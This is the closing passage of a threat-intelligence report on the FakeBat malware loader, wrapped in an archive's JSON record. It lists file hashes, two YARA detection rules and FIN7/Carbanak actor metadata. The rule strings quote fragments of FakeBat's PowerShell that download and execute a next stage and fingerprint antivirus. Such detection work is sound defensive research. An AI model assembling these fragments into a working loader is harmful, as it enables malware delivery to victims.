files\r\nc336d98d8d4810666ee4693e8c3a2a34191bad864d6b46e468a7eed36e7085f4\r\n7265ffdbe31dd96d6e6c8ead5a56817c905ff012418546e2233b7dce22372630\r\n9aa39f017b50dcc2214ce472d3967721c676a7826030c2e34cb95c495dba4960\r\n1bb51d62457f606e947a4e7ce86198e9956ae1fe4e51e4e945370cc25fe6bfff\r\n400277618bd2591efb2eb22ac0041c1c5561d96c479a60924ef799de3e2d290c\r\nf3ebb23bdcc7ac016d958c1a057152636bc2372b3a059bf49675882f64105068\r\n12ea41f2dfa89ad86f082fdf80ca57f14cd8a8f27280aca4f18111758de96d15\r\n3bd95eadb44349c7d88ea989501590fb3652ae27eded15ab5d12b17e2708969f\r\n67663233f9e3763171afd3a44b769dc67a8a61d4a159f205003c5fdb150e2ca1\r\nf0e0aea32962a8a4aecd0c4b0329dc7e901fa5b103f0b03563cf9705d751bbe1\r\n8f88a86d57b93cd7f63dfdf3cb8cc398cdce358e683fb04e19b0d0ed73dd50ee\r\n3d3a9cd140972b7b8a01dde2e4cd9707913f2eba09a3742c72016fd073004951\r\n96bd6abb1c8ec2ede22b915a11b97c0cd44c1f5ed1cda8bee0acfee290f8f580\r\nf1d72a27147c42a4f4baf3e10a6f03988c70546bb174a1025553a8319717ba95\r\n806d08e6169569eb1649b2d1f770ad30a01ff55beedfe93aebccac2bc24533c0\r\n763bdd0b5413bb2e0e3c4a68a7542586bbd638665b7ca250dbd9c7558216e427\r\n9a2268162982113c12d163b1377dc4e72c93f91e26bd511d16c1b705262ca03c\r\ne5b94c001fc3c1c1aa35c71a3d1e9909124339e0ade09f897b918fe0729c12e1\r\n9e800a05e65efe923a35815157129652980f03cbcf95cf0d64676f6da73471de\r\nf312e59be5ddbf857d92de506d55ae267800b0cbc2b82665ce63c889a7ae9414\r\n7c7dc62ed7af2f90aeafdd5c3af5284c5539aeded7d642d39f5fd5f187d33c87\r\n409a2a2a4e442017e6d647524fdec11507515a9f58a314e74307e67059bd8149\r\n1d5d671bf680d739ded1e25e78970b38d00e8182816171a7c6a186504a79eeee\r\naa998fde06a6a6ab37593c054333e192ce4706a14d210d8fc6c0de3fd2d74ce2\r\n767dd301dc5297828a35eaba81f84bd0f50d61fe1a9208b8d89b5eaba064d65e\r\n7d0aaf734f73c1cf93e53703e648125bba43e023203be9a938f270dfe3492718\r\n6e0179344ca0bbc42dce77027f5a6a049844daf34595fd184d9f094e8c74325c\r\n49a7668d60e8df9d0a57ba9e0e736c1eb48700da19711cc0ec0f3c94a56ce507\r\n2e8a82f07de254848615f81272f08e0cf9af474d1c20f67d9ddbdf439f1d8fde\r\nf0f77c85c7da4391e34d106c4b5f671eb606ba695dc11401a6ee8ae53e337cbe\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 16 of 19\n\nd1da457b0891b68df16ce86e2a48a799b9528c1631bccc379623551f873c0eed\r\n175fcb7495c0814a5c18afa6244d467f0daeb0f02ad93c0ab4d3af8cbbacb537\r\n7316ed0cb0fdbede33a0b6d05d0be1fe3c616ef7c1098dfcc9a2339c793e7020\r\n90641a72a4ea6f1fca57ec5e5daec4319ec95bec53dd2bf0fa58d1f9ade42ad4\r\n6fb502d83b7b5181abcb53784270239cc3e4143344e1f64101537aa3848c8c95\r\n2b033fc28ad12cb57c7c691bd40911ca47dd2a8e495a2d253557d2c6bcd40c5e\r\nInitial PowerShell script\r\n4029e194864e2557786e169c7f2c101b9972164de7b4f1ffadf89382317cf96c\r\n020cd2e4ec27185550bf736b490d8ace0d244fe09315f9f7e18362de659bc7ad\r\nb5ed2f42359e809bf171183a444457c378355d07b414f5828e1e4f7b35bb505f\r\n5ee273180702a54f32520be02c170ad154588893b63eefe2062cdb34ad83712c\r\n1c5cadde01f10a730cd8f55633c967c3a7259f4906f961477b7e095e7db326b7\r\n72a1f6e7979daae38d8e0e14893db4c182b8362acc5d721141ed328ed02c7e28\r\n00e7e8a0e8495189bb7feca21864fbd6c61a5aa680462186504de02536e0c2f9\r\n088ed84658a7c3bef4401601ef67a6953492fb0200a3b580bfabb21cd3ac8236\r\nb7aa4697e16bbafe0df02ab3b8d0be8ec6e4abf6e6ca7d787d3d3684ca8f4b63\r\nf138728ce2cc87201a51c9250fa87cbab20354012a8f566e1b2cd776cc1a66af\r\n0c4cef985c90ed764f041c2ccab6820fdbe38edaaddebe01a5b8d31d93204b88\r\nf8ab48848ab915d1b23e3ee51dd20a2699bd4f277bde218a727d7a55a572d174\r\n07a0986ab43f717e181a32d6742b11f788403ce582ad5fcbb9d20d0bd40d410b\r\n5e5c134cea48e57da9604981c0a7fd6ef1704c4151b540f29de685e0017fa730\r\ne3f18df1d8f5e27a41221246cc63236487c56354ba0c926a3fdaea70db901adb\r\n4e39fa74e49be2bf26fbfbbcea12d1374fa2f1607ff7fa2a0c8c323e697959ad\r\nd069437eda843bd7a675a1cca7fd4922803833f39265d951fa01e7ad8e662c60\r\n904ce1b1ffa601f9aeb0a6d68bc83532c5e76b958029bd1c889937fa7cf1867f\r\nFingerprint PowerShell script\r\n00ea5d43f2779a705856a824a3f8133cb100101e043cb670e49b163534b0c525\r\ncea1c4f2229e7aa0167c07e22a3809f42ec931332da7cc28f7d14b9e702af66b\r\nae641dda420f2cf63ac29804f7009ba1c248c702679fbccef35e4d9319d77d2d\r\nYARA rules\r\nYARA rules are available on Sekoia.io GitHub repository.\r\nFakeBat, initial PowerShell script\r\nrule loader_fakebat_initial_powershell_may24 {\r\n meta:\r\n malware = \"FakeBat\"\r\n description = \"Finds FakeBat initial PowerShell script downloading and executing the next-stage payloa\r\n source = \"Sekoia.io\"\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 17 of 19\n\nclassification = \"TLP:WHITE\"\r\n strings:\r\n $str01 = \"='http\" wide\r\n $str02 = \"=(iwr -Uri $\" wide\r\n $str03 = \" -UserAgent $\" wide\r\n $str04 = \" -UseBasicParsing).Content; iex $\" wide\r\n condition:\r\n 3 of ($str*) and\r\n filesize \u003c 1KB\r\n}\r\nFakeBat, fingerprint PowerShell script\r\nrule loader_fakebat_powershell_fingerprint_may24 {\r\n meta:\r\n malware = \"FakeBat\"\r\n description = \"Finds FakeBat PowerShell script fingerprinting the infected host.\"\r\n source = \"Sekoia.io\"\r\n classification = \"TLP:WHITE\"\r\n strings:\r\n $str01 = \"Get-WmiObject Win32_ComputerSystem\" ascii\r\n $str02 = \"-Class AntiVirusProduct\" ascii\r\n $str03 = \"status = \\\"start\\\"\" ascii\r\n $str04 = \" | ConvertTo-Json\" ascii\r\n $str05 = \".FromXmlString(\" ascii\r\n $str06 = \" = Invoke-RestMethod -Uri \" ascii\r\n $str07 = \".Exception.Response.StatusCode -eq 'ServiceUnavailable'\" ascii\r\n $str08 = \"Invoke-WebRequest -Uri $url -OutFile \" ascii\r\n $str09 = \"--batch --yes --passphrase-fd\" ascii\r\n $str10 = \"--decrypt --output\" ascii\r\n $str11 = \"Invoke-Expression \\\"tar --extract --file=\" ascii\r\n condition:\r\n 7 of ($str*) and\r\n filesize \u003c 10KB\r\n}\r\nExternal references\r\n1. https://www.esentire.com/blog/fakebat-malware-distributing-via-fake-browser-updates ↩︎\r\n2. https://x.com/crep1x/status/1790848244047651256 ↩︎\r\n3. https://tria.ge/240515-xntbmsfc65/behavioral1 ↩︎\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 18 of 19\n\n4. https://www.esentire.com/blog/fin7-uses-trusted-brands-and-sponsored-google-ads-to-distribute-msix-payloads ↩︎\r\n5. https://x.com/bryceabdo/status/1786192145809809492 ↩︎\r\n6. https://www.threatdown.com/blog/active-nitrogen-campaign-delivered-via-malicious-ads-for-putty-filezilla/ ↩︎\r\nThank you for reading this blogpost. We welcome any reaction, feedback or critics about this analysis. Please\r\ncontact us on tdr[at]sekoia.io.\r\nFeel free to read other Threat Detection \u0026 Research analysis here :\r\nCTI Cybercrime Infrastructure Malware\r\nShare this post:\r\nSource: https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/" ], "report_names": [ "exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure" ], "threat_actors": [ { "id": "c9617bb6-45c8-495e-9759-2177e61a8e91", "created_at": "2022-10-25T15:50:23.405039Z", "updated_at": "2026-04-10T02:00:05.387643Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Carbanak", "Anunak" ], "source_name": "MITRE:Carbanak", "tools": [ "Carbanak", "Mimikatz", "PsExec", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf", "created_at": "2023-01-06T13:46:38.405479Z", "updated_at": "2026-04-10T02:00:02.961112Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "ATK32", "G0046", "G0008", "Sangria Tempest", "ELBRUS", "GOLD NIAGARA", "Coreid", "Carbanak", "Carbon Spider", "JokerStash", "CARBON SPIDER" ], "source_name": "MISPGALAXY:FIN7", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ed3810b7-141a-4ed0-8a01-6a972b80458d", "created_at": "2022-10-25T16:07:23.443259Z", "updated_at": "2026-04-10T02:00:04.602946Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Anunak", "Carbanak", "Carbon Spider", "ELBRUS", "G0008", "Gold Waterfall", "Sangria Tempest" ], "source_name": "ETDA:Carbanak", "tools": [ "AVE_MARIA", "Agentemis", "AmmyyRAT", "Antak", "Anunak", "Ave Maria", "AveMariaRAT", "BABYMETAL", "BIRDDOG", "Backdoor Batel", "Batel", "Bateleur", "BlackMatter", "Boostwrite", "Cain \u0026 Abel", "Carbanak", "Cl0p", "Cobalt Strike", "CobaltStrike", "DNSMessenger", "DNSRat", "DNSbot", "DRIFTPIN", "DarkSide", "FOXGRABBER", "FlawedAmmyy", "HALFBAKED", "JS Flash", "KLRD", "MBR Eraser", "Mimikatz", "Nadrac", "Odinaff", "POWERPIPE", "POWERSOURCE", "PsExec", "SQLRAT", "Sekur", "Sekur RAT", "SocksBot", "SoftPerfect Network Scanner", "Spy.Agent.ORM", "TEXTMATE", "TeamViewer", "TiniMet", "TinyMet", "Toshliph", "VB Flash", "WARPRISM", "avemaria", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "630987b6-1240-486a-ad47-bb63d6573e6b", "created_at": "2024-09-20T02:00:04.579123Z", "updated_at": "2026-04-10T02:00:03.697899Z", "deleted_at": null, "main_name": "UNC4536", "aliases": [], "source_name": "MISPGALAXY:UNC4536", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bfded1cf-be73-44f9-a391-0751c9996f9a", "created_at": "2022-10-25T15:50:23.337107Z", "updated_at": "2026-04-10T02:00:05.252413Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "FIN7", "GOLD NIAGARA", "ITG14", "Carbon Spider", "ELBRUS", "Sangria Tempest" ], "source_name": "MITRE:FIN7", "tools": [ "Mimikatz", "AdFind", "JSS Loader", "HALFBAKED", "REvil", "PowerSploit", "CrackMapExec", "Carbanak", "Pillowmint", "Cobalt Strike", "POWERSOURCE", "RDFSNIFFER", "SQLRat", "Lizar", "TEXTMATE", "BOOSTWRITE" ], "source_id": "MITRE", "reports": null }, { "id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82", "created_at": "2022-10-25T16:07:23.619566Z", "updated_at": "2026-04-10T02:00:04.690061Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "APT-C-11", "ATK 32", "G0046", "Gold Niagara", "GrayAlpha", "ITG14", "TAG-CR1" ], "source_name": "ETDA:FIN7", "tools": [ "7Logger", "Agentemis", "Anubis Backdoor", "Anunak", "Astra", "BIOLOAD", "BIRDWATCH", "Bateleur", "Boostwrite", "CROWVIEW", "Carbanak", "Cobalt Strike", "CobaltStrike", "DICELOADER", "DNSMessenger", "FOWLGAZE", "HALFBAKED", "JSSLoader", "KillACK", "LOADOUT", "Lizar", "Meterpreter", "Mimikatz", "NetSupport", "NetSupport Manager", "NetSupport Manager RAT", "NetSupport RAT", "NetSupportManager RAT", "POWERPLANT", "POWERSOURCE", "RDFSNIFFER", "Ragnar Loader", "SQLRAT", "Sardonic", "Sekur", "Sekur RAT", "TEXTMATE", "Tirion", "VB Flash", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434405, "ts_updated_at": 1775792152, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/adc3bbd04b39dfd993f8483a7b6dacf2c4304a65.pdf", "text": "https://archive.orkl.eu/adc3bbd04b39dfd993f8483a7b6dacf2c4304a65.txt", "img": "https://archive.orkl.eu/adc3bbd04b39dfd993f8483a7b6dacf2c4304a65.jpg" } }